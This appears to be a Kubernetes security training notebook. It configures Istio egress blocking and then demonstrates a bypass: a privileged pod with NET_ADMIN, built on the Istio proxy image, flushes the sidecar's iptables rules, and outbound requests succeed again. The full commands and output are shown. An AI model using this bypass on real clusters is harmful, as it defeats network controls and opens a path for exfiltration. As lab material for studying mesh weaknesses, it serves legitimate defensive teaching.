**This notebook covered by the following [license](License.ipynb)  This note must not be removed**

# Istio Egress Control and Hack

Starting [Istio Egress Control](https://istio.io/latest/docs/tasks/traffic-management/egress/egress-control/)

In [1]:
cd istio-*
pwd

/minikube-host/notebooks/training-kubernetes-security/istio-1.12.0


In [ ]:
kubectl label namespace default istio-injection=enabled

# Check defaults

In [7]:
kubectl get istiooperator installed-state -n istio-system -o jsonpath='{.spec.meshConfig.outboundTrafficPolicy.mode}'


In [6]:
export PATH=$PATH:$(pwd)/bin

In [8]:
istioctl install --set profile=demo -y --set meshConfig.outboundTrafficPolicy.mode=ALLOW_ANY


✔ Istio core installed                                                          
✔ Istiod installed                                                              
✔ Ingress gateways installed                                                    
✔ Egress gateways installed                                                     
✔ Installation complete                                                         Making this installation the default for injection and validation.

Thank you for installing Istio 1.12.  Please take a few minutes to tell us about your install/upgrade experience!  https://forms.gle/FegQbc9UvePd4Z9z7


In [14]:
kubectl get $POD sleep -o yaml |grep image:

error: the server doesn't have a resource type "sleep-56bc8d768-m52vz"


: 1

# Create test pod

In [ ]:
kubectl apply -f - <<EOF
apiVersion: v1
kind: Service
metadata:
  name: sleep
  labels:
    app: sleep
spec:
  ports:
  - port: 80
    name: http
  selector:
    app: sleep
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: sleep
spec:
  replicas: 1
  selector:
    matchLabels:
      app: sleep
  template:
    metadata:
      labels:
        app: sleep
    spec:
      containers:
      - name: sleep
        image: pstauffer/curl
        command: ["/bin/sleep", "3650d"]
        imagePullPolicy: IfNotPresent
---
EOF

In [ ]:
kubectl get pods

In [15]:
export POD=$(kubectl get pods -l app=sleep -o jsonpath='{.items[0].metadata.name}')
echo $POD

sleep-56bc8d768-m52vz


In [16]:
kubectl get pod $POD -o yaml |grep image:

    image: pstauffer/curl
    image: docker.io/istio/proxyv2:1.12.0
    image: docker.io/istio/proxyv2:1.12.0
    image: istio/proxyv2:1.12.0
    image: pstauffer/curl:latest
    image: istio/proxyv2:1.12.0


In [9]:
kubectl exec -c sleep $POD -- curl -s  heise.de

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.heise.de/">here</a>.</p>
</body></html>


# Works as intended, let us block it

In [10]:
istioctl install --set profile=demo -y --set meshConfig.outboundTrafficPolicy.mode=REGISTRY_ONLY

✔ Istio core installed                                                          
✔ Istiod installed                                                              
✔ Egress gateways installed                                                     
✔ Ingress gateways installed                                                    
✔ Installation complete                                                         Making this installation the default for injection and validation.

Thank you for installing Istio 1.12.  Please take a few minutes to tell us about your install/upgrade experience!  https://forms.gle/FegQbc9UvePd4Z9z7


In [11]:
kubectl exec -c sleep $POD -- curl heise.de

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0


In [12]:
kubectl get pods $POD -o yaml

apiVersion: v1
kind: Pod
metadata:
  annotations:
    kubectl.kubernetes.io/default-container: sleep
    kubectl.kubernetes.io/default-logs-container: sleep
    prometheus.io/path: /stats/prometheus
    prometheus.io/port: "15020"
    prometheus.io/scrape: "true"
    sidecar.istio.io/status: '{"initContainers":["istio-init"],"containers":["istio-proxy"],"volumes":["istio-envoy","istio-data","istio-podinfo","istio-token","istiod-ca-cert"],"imagePullSecrets":null,"revision":"default"}'
  creationTimestamp: "2021-12-01T10:34:06Z"
  generateName: sleep-56bc8d768-
  labels:
    app: sleep
    pod-template-hash: 56bc8d768
    security.istio.io/tlsMode: istio
    service.istio.io/canonical-name: sleep
    service.istio.io/canonical-revision: latest
  name: sleep-56bc8d768-m52vz
  namespace: default
  ownerReferences:
  - apiVersion: apps/v1
    blockOwnerDeletion: true
    controller: true
    kind: ReplicaSet
    name: sleep-56bc8d768
    uid: d007f1fa-c757-4b66-83e7-672494b69e3f
  resourceV

# The hack

- same image as above
- we use the original istio proxy image
  - iptables included
  - `NET_ADMIN` capability not detected
  - revert the iptables rules

In [17]:
kubectl apply -f -<<EOF
apiVersion: v1
kind: Pod
metadata:
  name: escape
  namespace: default
spec:
  containers:
  - name: sleep
    image: pstauffer/curl
    command: ["/bin/sleep", "3650d"]
    imagePullPolicy: IfNotPresent
  - image: istio/proxyv2:1.12.0
    name: escape
    command:
      - "/bin/bash"
    args:
      - "-c"
      - |+
        echo
        echo "########  old rules ###########"
        echo
        iptables-save
        echo
        echo "######## cleared rules ##########"
        echo
        iptables -P INPUT ACCEPT
        iptables -P FORWARD ACCEPT
        iptables -P OUTPUT ACCEPT
        iptables -t nat -F
        iptables -t mangle -F
        iptables -F
        iptables -X
        iptables-save
        sleep 3650d
    securityContext:
      capabilities:
        add:
        - NET_ADMIN
      privileged: true
  restartPolicy: Always
EOF

pod/escape created


In [19]:
kubectl get pods 

NAME                    READY   STATUS    RESTARTS   AGE
escape                  3/3     Running   0          23s
sleep-56bc8d768-m52vz   2/2     Running   0          70m
web-79d88c97d6-w67s8    1/1     Running   0          3h8m
web2-5d47994f45-kjqxc   1/1     Running   0          3h2m


In [20]:
kubectl get pods escape -o yaml

apiVersion: v1
kind: Pod
metadata:
  annotations:
    kubectl.kubernetes.io/last-applied-configuration: |
      {"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{},"name":"escape","namespace":"default"},"spec":{"containers":[{"command":["/bin/sleep","3650d"],"image":"pstauffer/curl","imagePullPolicy":"IfNotPresent","name":"sleep"},{"args":["-c","echo\necho \"########  old rules ###########\"\necho\niptables-save\necho\necho \"######## cleared rules ##########\"\necho\niptables -P INPUT ACCEPT\niptables -P FORWARD ACCEPT\niptables -P OUTPUT ACCEPT\niptables -t nat -F\niptables -t mangle -F\niptables -F\niptables -X\niptables-save\nsleep 3650d\n"],"command":["/bin/bash"],"image":"istio/proxyv2:1.12.0","name":"escape","securityContext":{"capabilities":{"add":["NET_ADMIN"]},"privileged":true}}],"restartPolicy":"Always"}}
    prometheus.io/path: /stats/prometheus
    prometheus.io/port: "15020"
    prometheus.io/scrape: "true"
    sidecar.istio.io/status: '{"initContainers":["istio

In [21]:
kubectl logs escape -c escape


########  old rules ###########

# Generated by iptables-save v1.8.4 on Wed Dec  1 11:44:06 2021
*nat
:PREROUTING ACCEPT [0:0]
:INPUT ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
:ISTIO_INBOUND - [0:0]
:ISTIO_IN_REDIRECT - [0:0]
:ISTIO_OUTPUT - [0:0]
:ISTIO_REDIRECT - [0:0]
-A PREROUTING -p tcp -j ISTIO_INBOUND
-A OUTPUT -p tcp -j ISTIO_OUTPUT
-A ISTIO_INBOUND -p tcp -m tcp --dport 15008 -j RETURN
-A ISTIO_INBOUND -p tcp -m tcp --dport 22 -j RETURN
-A ISTIO_INBOUND -p tcp -m tcp --dport 15090 -j RETURN
-A ISTIO_INBOUND -p tcp -m tcp --dport 15021 -j RETURN
-A ISTIO_INBOUND -p tcp -m tcp --dport 15020 -j RETURN
-A ISTIO_INBOUND -p tcp -j ISTIO_IN_REDIRECT
-A ISTIO_IN_REDIRECT -p tcp -j REDIRECT --to-ports 15006
-A ISTIO_OUTPUT -s 127.0.0.6/32 -o lo -j RETURN
-A ISTIO_OUTPUT ! -d 127.0.0.1/32 -o lo -m owner --uid-owner 1337 -j ISTIO_IN_REDIRECT
-A ISTIO_OUTPUT -o lo -m owner ! --uid-owner 1337 -j RETURN
-A ISTIO_OUTPUT -m owner --uid-owner 1337 -j RETURN
-A ISTIO_OUTPUT !

In [22]:
kubectl exec -it escape -c sleep -- curl -s heise.de 

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.heise.de/">here</a>.</p>
</body></html>


In [23]:
kubectl exec -it escape -c sleep -- curl -sL heise.de | wc

  22140   37172  745717


In [24]:
kubectl get pods --all-namespaces

NAMESPACE       NAME                                        READY   STATUS      RESTARTS   AGE
default         escape                                      3/3     Running     0          3m20s
default         sleep-56bc8d768-m52vz                       2/2     Running     0          73m
default         web-79d88c97d6-w67s8                        1/1     Running     0          3h11m
default         web2-5d47994f45-kjqxc                       1/1     Running     0          3h5m
ingress-nginx   ingress-nginx-admission-create--1-4r566     0/1     Completed   0          3h22m
ingress-nginx   ingress-nginx-admission-patch--1-p9jbg      0/1     Completed   0          3h22m
ingress-nginx   ingress-nginx-controller-69bdbc4d57-dtkpc   1/1     Running     0          3h22m
istio-system    istio-egressgateway-7f4864f59c-2gknh        1/1     Running     0          77m
istio-system    istio-ingressgateway-55d9fb9f-r9zds         1/1     Running     0          77m
istio-system    istiod-555d47cb65-g8g6c

In [ ]:
istioctl 

In [ ]:
istioctl analyze